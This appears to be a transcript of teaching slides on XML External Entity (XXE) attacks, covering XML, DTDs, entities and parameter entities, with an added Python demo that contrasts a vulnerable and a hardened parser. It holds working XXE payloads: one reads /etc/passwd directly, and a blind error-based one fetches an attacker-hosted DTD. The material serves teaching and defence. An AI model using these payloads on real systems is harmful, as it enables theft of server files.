This document discusses XML External Entity (XXE) attacks. It begins with an overview of XXE attacks and their ranking in the OWASP Top 10 list. It then provides background on XML, explaining what it is, how it is structured, and how to define DTDs. The document demonstrates different types of XXE attacks like retrieving files, performing server-side request forgery, and exfiltrating data blindly. It also covers mitigations like disabling external entities.
3. # Description:
An XML External Entity attack is a type of attack against an
application that parses XML input. This attack occurs when XML input
containing a reference to an external entity is processed by a weakly
configured XML parser.
Ranked 4th in the OWASP Top 10 (2017), as A4:2017-XML External Entities (XXE).
- OWASP
5. # What is XML?
XML stands for eXtensible Markup Language. It is a text-based
markup language.
XML 1.0 became a W3C Recommendation in 1998. It was created as an
easy way to store and exchange self-describing data.
XML is designed to carry data, not to display data.
XML tags are not predefined; you define your own tags.
XML is platform independent and language independent.
6. # XML Example:
<?xml version="1.0"?>
<NullMeet>
  <Speaker>
    <FirstName>Ankit</FirstName>
    <LastName>Patel</LastName>
    <ContactNo>1234567890</ContactNo>
    <Email>ankitpatel@null_mumbai.com</Email>
    <City>Mumbai</City>
  </Speaker>
</NullMeet>
8. # XML Attributes vs Elements
XML using attributes:
<person gender="male">
  <firstname>Ankit</firstname>
  <lastname>Patel</lastname>
</person>
XML using elements:
<person>
  <gender>male</gender>
  <firstname>Ankit</firstname>
  <lastname>Patel</lastname>
</person>
9. # XML DTD
DTD stands for Document Type Definition.
A DTD defines the structure and the legal elements and attributes of
an XML document. It is attached to a document through the <!DOCTYPE>
declaration.
Why use a DTD?
An application can use a DTD to verify that the XML it receives is valid
(validity against the DTD, which is stricter than mere well-formedness).
10. # Types of DTD
There are two types of DTD:
Internal DTD
External DTD
Internal DTD
If the DTD is declared inside the XML file, it must be wrapped inside
the <!DOCTYPE> declaration.
External DTD
If the DTD is kept in an external file, the <!DOCTYPE> declaration
must contain a reference to the DTD file.
12. # Internal DTD
The !DOCTYPE NullMeet declaration defines that the root element of this document
is NullMeet.
The !ELEMENT NullMeet declaration defines that the NullMeet element must
contain five child elements, in this order: FirstName, LastName, ContactNo,
Email, City.
The !ELEMENT declarations for FirstName, LastName, ContactNo, Email and City
define each of those elements to be of type #PCDATA (parsed character data).
13. # External DTD
If the DTD is declared in an external file, the <!DOCTYPE> definition
must contain a reference to the DTD file.
External DTD file:
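Reconstructed as an added example from the descriptions on the two slides above (the slides' own DTD listings are not in this transcript): the NullMeet document with its DTD declared internally, followed by the same DTD moved into an external file and the <!DOCTYPE> that references it. The file name NullMeet.dtd is an assumption.

```xml
<?xml version="1.0"?>
<!-- Internal DTD: the declarations sit inside the <!DOCTYPE> of the document itself -->
<!DOCTYPE NullMeet [
  <!ELEMENT NullMeet (FirstName, LastName, ContactNo, Email, City)>
  <!ELEMENT FirstName (#PCDATA)>
  <!ELEMENT LastName (#PCDATA)>
  <!ELEMENT ContactNo (#PCDATA)>
  <!ELEMENT Email (#PCDATA)>
  <!ELEMENT City (#PCDATA)>
]>
<NullMeet>
  <FirstName>Ankit</FirstName>
  <LastName>Patel</LastName>
  <ContactNo>1234567890</ContactNo>
  <Email>ankitpatel@null_mumbai.com</Email>
  <City>Mumbai</City>
</NullMeet>

<!-- External DTD: the file NullMeet.dtd (assumed name) holds the same declarations -->
<!ELEMENT NullMeet (FirstName, LastName, ContactNo, Email, City)>
<!ELEMENT FirstName (#PCDATA)>
<!ELEMENT LastName (#PCDATA)>
<!ELEMENT ContactNo (#PCDATA)>
<!ELEMENT Email (#PCDATA)>
<!ELEMENT City (#PCDATA)>

<?xml version="1.0"?>
<!-- The document now references the file instead of embedding the declarations.
     A parser that honours this reference fetches NullMeet.dtd from wherever the
     SYSTEM identifier points, which is the same fetch mechanism XXE abuses. -->
<!DOCTYPE NullMeet SYSTEM "NullMeet.dtd">
<NullMeet>
  <FirstName>Ankit</FirstName>
  <LastName>Patel</LastName>
  <ContactNo>1234567890</ContactNo>
  <Email>ankitpatel@null_mumbai.com</Email>
  <City>Mumbai</City>
</NullMeet>
```

Both documents validate against the same rules; the only difference is where the parser has to go to find them.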
15. # XML DTD entities
Entities are named pieces of reusable text; they are commonly used as
shortcuts for special characters or for content that is repeated.
Entities can be declared internal or external.
Internal Entity
An internal entity is one whose value is defined locally within the DTD.
Declaring the internal entity
Entities must be declared before they can be used.
All entities are declared with an ENTITY declaration.
16. # XML DTD built-in entities
All XML parsers must support the built-in (predefined) entities, which
need no declaration.
There are five built-in entities that play their role in well-formed
XML:
&amp; ampersand: &
&apos; single quote: '
&gt; greater than: >
&lt; less than: <
&quot; double quote: "
17. # XML DTD entities
Internal entity example:
I. Syntax
<!ENTITY entity-name "entity-value">
II. Internal DTD example
<!DOCTYPE Nullmum [
<!ENTITY writer "Ankit">
]>
The XML file:
<Nullmum>&writer;</Nullmum>
When the document is parsed, &writer; is replaced by Ankit.
18. # XML DTD entities
External entity
External entities, like internal entities, have names and are referenced in the
same manner, although they are declared differently.
External entity example:
I. Syntax
<!ENTITY entity-name SYSTEM "URI/URL">
The SYSTEM keyword marks the entity as external and must be followed by a
URI. Schemes such as http, ftp and file are accepted by the syntax, but
which schemes a parser will actually fetch depends on the parser and the
platform it runs on.
II. External DTD example
The XML file:
<!DOCTYPE author [
<!ENTITY writer SYSTEM "https://www.w3schools.com/external.dtd">
]>
<author>&writer;</author>
When the parser resolves &writer;, it fetches the resource at that URI and
substitutes its contents into the document. That fetch-and-substitute
behaviour is what XXE attacks abuse.
20. # Types of XXE attacks
There are various types of XXE attacks:
Exploiting XXE to retrieve files, where an external entity is defined
containing the contents of a file, which is then returned in the
application's response.
Exploiting XXE to perform SSRF attacks, where an external entity is
defined based on a URL to a back-end system.
Exploiting blind XXE to exfiltrate data out-of-band, where sensitive data
is transmitted from the application server to a system that the
attacker controls.
Exploiting blind XXE to retrieve data via error messages, where the
attacker triggers a parsing error message that contains sensitive data.
21. # Exploiting XXE to retrieve files
Payload used (the DOCTYPE declaring the external entity is prepended to
the XML the application already expects, and the entity reference
replaces a value the application reflects in its response):
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<productId>&xxe;</productId>
The parser substitutes the contents of /etc/passwd for &xxe;. Because the
application echoes productId back, the file contents appear in the
response; if the value were not reflected, the attack would have to be
carried out blind (see the later slides).
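To make the file-retrieval attack concrete, here is an added example (not from the slides) using Python's standard-library xml.sax parser, which is built on expat. The secret file and the payload are constructed in the example; the file stands in for /etc/passwd, and the handler and function names are the example's own. The vulnerable behaviour is reproduced by switching on the feature_external_ges feature explicitly: since Python 3.7.1 xml.sax leaves it off by default, which is the "disable external entities" mitigation, so the same payload parsed with the default setting yields an empty productId.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class ProductIdHandler(ContentHandler):
    """Collects the character data of <productId>, as a naive application
    that reflects the value in its response would."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.parts = []

    def startElement(self, name, attrs):
        self._inside = name == "productId"

    def endElement(self, name):
        if name == "productId":
            self._inside = False

    def characters(self, content):
        # Text substituted from an entity arrives here exactly like literal text.
        if self._inside:
            self.parts.append(content)

    @property
    def value(self):
        return "".join(self.parts)


def parse_product_id(xml_bytes, resolve_external_entities):
    """Parse the request body and return the productId text.

    resolve_external_entities=True reproduces a weakly configured parser
    (the xml.sax default before Python 3.7.1): the SYSTEM entity is fetched
    and its contents substituted. False is the hardened setting and the
    current default: the external entity is silently skipped.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = ProductIdHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.value


def make_payload(target_uri):
    """The slide's file-retrieval payload, parameterised on the file URI."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{target_uri}"> ]>\n'
        "<productId>&xxe;</productId>\n"
    ).encode()


# Constructed stand-in for a line of /etc/passwd; the real file is not read.
SECRET_LINE = "root:x:0:0:root:/root:/bin/bash"


def demo():
    """Return (leaked, hardened): the productId text seen by the vulnerable
    and by the hardened parser for the same payload."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(SECRET_LINE + "\n")
        secret_path = pathlib.Path(f.name)
    try:
        payload = make_payload(secret_path.as_uri())  # file:///tmp/... URI
        leaked = parse_product_id(payload, resolve_external_entities=True)
        hardened = parse_product_id(payload, resolve_external_entities=False)
    finally:
        secret_path.unlink()
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

The point to take from the two calls is that nothing in the payload changes between them; the outcome is decided entirely by the parser configuration, which is why the fix for XXE is a parser setting rather than input filtering.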
25. # Parameter Entities
Parameter entities accomplish the same task as general entities do, but
they are used exclusively within DTDs: they are declared with a % sign
between ENTITY and the name, and referenced as %name; rather than &name;.
Using parameter entities you can include element and attribute list
declarations as groups and refer to them easily as single entities.
You can even include an entire DTD in a parameter entity.
Example:
<!ENTITY % myParameterEntity "Element">
26. # Parameter Entities
Example :-
<!ENTITY % customer "name, street, city, state, zipcode">
Later in the DTD, you can reference this parameter entity as follows:
<!ELEMENT invoice (%customer;, item, price, date)>
When this DTD is processed, it is as if you had specified the following:
<!ELEMENT invoice (name, street, city, state, zipcode, item, price, date)>
Note that a parameter entity reference inside a markup declaration, as
above, is only permitted in an external DTD subset; in the internal subset
(inside <!DOCTYPE ... [ ]>) parameter entity references may only appear
between declarations. This restriction shapes the blind XXE payloads that
follow.
30. # Exploiting blind XXE to retrieve data via error messages
Payloads used:
External DTD hosted on a server the attacker controls (YOUR-DTD-URL below):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
XML file sent to the application:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
How it works: %xxe; makes the parser fetch the attacker's DTD. In that DTD,
%file loads /etc/passwd; %eval; declares a further parameter entity, exfil,
whose SYSTEM identifier embeds the file contents (the nested % is written as
&#x25; because a literal % is not allowed inside an entity value); and
%exfil; makes the parser try to load the nonexistent path
file:///invalid/<contents of /etc/passwd>. If the application returns the
parser's error to the client, the error message carries the file contents.
The trick has to live in an external DTD because the internal subset does
not allow parameter entity references inside markup declarations.